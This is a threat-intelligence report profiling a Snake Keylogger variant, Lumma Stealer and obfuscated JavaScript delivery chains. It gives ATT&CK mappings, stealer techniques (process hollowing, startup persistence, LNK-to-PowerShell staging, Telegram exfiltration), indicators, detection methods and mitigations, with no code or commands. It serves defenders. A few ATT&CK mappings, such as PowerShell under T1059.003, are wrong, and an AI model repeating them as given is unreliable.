Full Report
A new variant of the Snake Keylogger malware is being used to actively target Windows users located in China, Turkey, Indonesia, Taiwan, and Spain. Fortinet FortiGuard Labs said the new version of the malware has been behind over 280 million blocked infection attempts worldwide since the start of the year. "Typically delivered through phishing emails containing malicious attachments or links,
Analysis Summary
# Tool/Technique: Snake Keylogger (New Variant)
## Overview
A new variant of the Snake Keylogger malware actively targeting Windows users in China, Turkey, Indonesia, Taiwan, and Spain. Its primary purpose is to steal sensitive information from targeted systems by logging keystrokes, capturing credentials from web browsers, and monitoring the clipboard.
## Technical Details
- Type: Malware family
- Platform: Windows
- Capabilities: Keystroke logging, credential theft (browsers), clipboard monitoring, information exfiltration via SMTP and Telegram. Notable for initial delivery via AutoIt-compiled binaries.
- First Seen: Information not explicitly available for the variant, but global blocked attempts reported since the start of the year.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment
- T1566.002 - Spearphishing Link
- TA0003 - Persistence
- T1547 - Boot or Logon Autostart Execution
- T1547.001 - Registry Run Keys / Startup Folder
- TA0005 - Defense Evasion
- T1055 - Process Injection
- T1055.012 - Process Hollowing
- TA0009 - Collection
- T1056 - Input Capture
- T1056.001 - Keylogging
- T1115 - Clipboard Data
## Functionality
### Core Capabilities
- **Information Theft:** Logs keystrokes using `SetWindowsHookExA` with the `WH_KEYBOARD_LL` flag (13).
- **Credential Harvesting:** Targets credentials from browsers such as Chrome, Edge, and Firefox.
- **Geolocation:** Retrieves the victim's IP address and geolocation using external services like `checkip[.]dyndns[.]org`.
- **Exfiltration:** Sends stolen data to the attacker via SMTP and Telegram bots.
### Advanced Features
- **AutoIt Delivery:** The main payload is delivered and executed within an AutoIt-compiled binary, complicating static analysis and mimicking benign automation tools.
- **Persistence Mechanism:** Drops `ageless.vbs` into the Windows Startup folder to ensure execution upon system reboot.
- **Process Hollowing:** Injects the main payload into a legitimate .NET process (e.g., `regsvcs.exe`) for stealth.
- **File Dropping:** Drops a copy of itself as `ageless.exe` into `%Local_AppData%\\supergroup`.
## Indicators of Compromise
- File Hashes: [Not provided in the text]
- File Names: `ageless.exe`, `ageless.vbs`
- Registry Keys: Startup folder persistence mechanism (Implies entries for registry/startup location).
- Network Indicators: `checkip[.]dyndns[.]org`
- Behavioral Indicators: Use of `SetWindowsHookExA` with `WH_KEYBOARD_LL`, dropping files in `%Local_AppData%`, process hollowing into `regsvcs.exe`.
## Associated Threat Actors
- Not explicitly named, but linked to activity resulting in over 280 million blocked attempts globally.
## Detection Methods
- Signature-based detection: Target detection of the AutoIt-compiled binary structure.
- Behavioral detection: Monitoring for the creation of `ageless.vbs` in the Startup folder, API hooking via `WH_KEYBOARD_LL`, and process injection into legitimate processes like `regsvcs.exe`.
- YARA rules: Targeting structures common in AutoIt payloads or specific strings/API calls.
## Mitigation Strategies
- Implement robust email filtering to block malicious attachments and links associated with phishing campaigns.
- Monitor for unusual process injection techniques like process hollowing targeting legitimate Windows processes.
- Monitor the local application data and Startup folders for unauthorized file creation (`ageless.exe`, `ageless.vbs`).
- Application whitelisting or control to restrict execution of non-standard AutoIt binaries.
## Related Tools/Techniques
- Other Stealers (Lumma Stealer, discussed in the text)
- Use of legitimate scripting languages (like AutoIt) for camouflage.
***
# Tool/Technique: Lumma Stealer
## Overview
Lumma Stealer is an information stealer malware distributed via a multi-stage attack chain often leveraging compromised infrastructure, particularly associated with educational institutions and malicious LNK files disguised as PDFs. It is designed to steal passwords, browser data, and cryptocurrency wallet information.
## Technical Details
- Type: Malware family (Stealer)
- Platform: Windows
- Capabilities: Theft of passwords, browser data, and cryptocurrency wallets via a multi-stage infection chain originating from LNK files.
- First Seen: Recent activity detailed in the article.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1566 - Phishing (Implied by malicious document delivery)
- TA0002 - Execution
- T1204 - User Execution
- T1204.002 - Malicious File
- TA0003 - Persistence
- T1547 - Boot or Logon Autostart Execution (Likely implemented in later stages)
- TA0009 - Collection
- T1555 - Credentials from Web Browsers
- T1115 - Clipboard Data
## Functionality
### Core Capabilities
- **Payload Delivery via LNK:** Uses LNK files disguised as PDFs, hosted on WebDAV servers, to initiate execution.
- **Multi-Stage Infection:** LNK executes PowerShell, which fetches obfuscated JavaScript, which in turn executes another PowerShell script to download and execute the final Lumma Stealer payload.
- **Data Theft:** Targets passwords, browser data, and crypto wallets.
### Advanced Features
- **Stenography/Embedding:** A variation of the stealer distribution observed that uses steganography (embedding malicious MZ DOS executables within a JPG image and a text file) downloaded via PowerShell commands.
- **Exfiltration:** Exfiltrates data to a Telegram bot operated by the attacker.
## Indicators of Compromise
- File Hashes: SHA256 hash provided for one related obfuscated JavaScript file: `944c7070cb77d937c9bae8c30a367b1c15b2f8951329cdb64d4b02a5e145ea44`
- File Names: Malicious LNK files disguised as PDFs; obfuscated JavaScript files.
- Registry Keys: [Not provided]
- Network Indicators: Connections to WebDAV servers for LNK hosting; PowerShell connection to remote servers/URL shorteners to retrieve stages.
- Behavioral Indicators: Execution chains starting from `.LNK` files leading to PowerShell and subsequent obfuscated script execution.
## Associated Threat Actors
- Threat actors leveraging compromised infrastructure associated with educational institutions.
## Detection Methods
- Detection of LNK file execution leading to PowerShell.
- Analysis of obfuscated JavaScript traffic/content.
- Monitoring for connections to unknown or suspicious WebDAV endpoints hosting seemingly innocuous files.
## Mitigation Strategies
- Disable the automatic execution features for LNK/shortcut files where possible.
- Harden web infrastructure controls to prevent compromise and subsequent hosting of malicious files.
- Implement strict execution policies preventing the running of scripts retrieved from unusual sources.
## Related Tools/Techniques
- Other Stealer malware distributed through obfuscated JavaScript.
***
# Tool/Technique: Obfuscated JavaScript Delivery Chain (General Trend)
## Overview
A technique frequently observed in recent threat activity, involving the use of heavily obfuscated JavaScript files to chain attacks, ultimately deploying stealer malware. This technique relies on scripts fetching encoded strings or staged payloads from remote sources.
## Technical Details
- Type: Technique
- Platform: Windows (Executed via script engines)
- Capabilities: Initial execution via script, fetching encoded strings/payloads from C2 or open-source services, downloading subsequent stages (e.g., JPG/TXT containing executables via steganography).
- First Seen: Recent observation cited in the context.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (PowerShell)
- T1059.005 - Visual Basic
- TA0007 - Discovery (Fetching encoded strings)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
## Functionality
### Core Capabilities
- **Obfuscation:** Hiding malicious logic within JavaScript to evade simple inline detection.
- **Staged Downloads:** Using the initial script to download further components, including PowerShell scripts.
- **Credential Delivery:** Fetching encoded strings from external sources (like open-source services) to construct the final command payload.
### Advanced Features
- **Steganography:** One observed variant uses steganography within a JPG image and a TXT file downloaded by PowerShell to embed and deploy the final malicious MZ DOS executable payload.
- **Multiple C2 Components:** Utilizing an IP address and a URL shortener simultaneously to retrieve payloads.
## Indicators of Compromise
- File Hashes: SHA256 hash provided for one related obfuscated JavaScript file: `944c7070cb77d937c9bae8c30a367b1c15b2f8951329cdb64d4b02a5e145ea44`
- File Names: Obfuscated Javascript files (e.g., `.js` extensions in unusual locations).
- Registry Keys: [Not detailed]
- Network Indicators: Connections to IP addresses and URL shorteners for payload retrieval.
- Behavioral Indicators: Execution of JavaScript leading directly to encoded string retrieval or PowerShell invocation.
## Associated Threat Actors
- Generic threat actors utilizing modern infection chains for stealer distribution.
## Detection Methods
- Signature-based detection targeting known malicious JavaScript obfuscation patterns.
- Deep packet inspection to identify downloads of executables disguised within image/text files (steganography detection).
- Behavioral monitoring of JavaScript execution leading to PowerShell execution.
## Mitigation Strategies
- Restrict execution of scripts from non-standard file types or unexpected locations.
- Implement EDR solutions capable of de-obfuscating and analyzing script behavior dynamically.
## Related Tools/Techniques
- PowerShell execution chains
- Steganography utilized for payload delivery.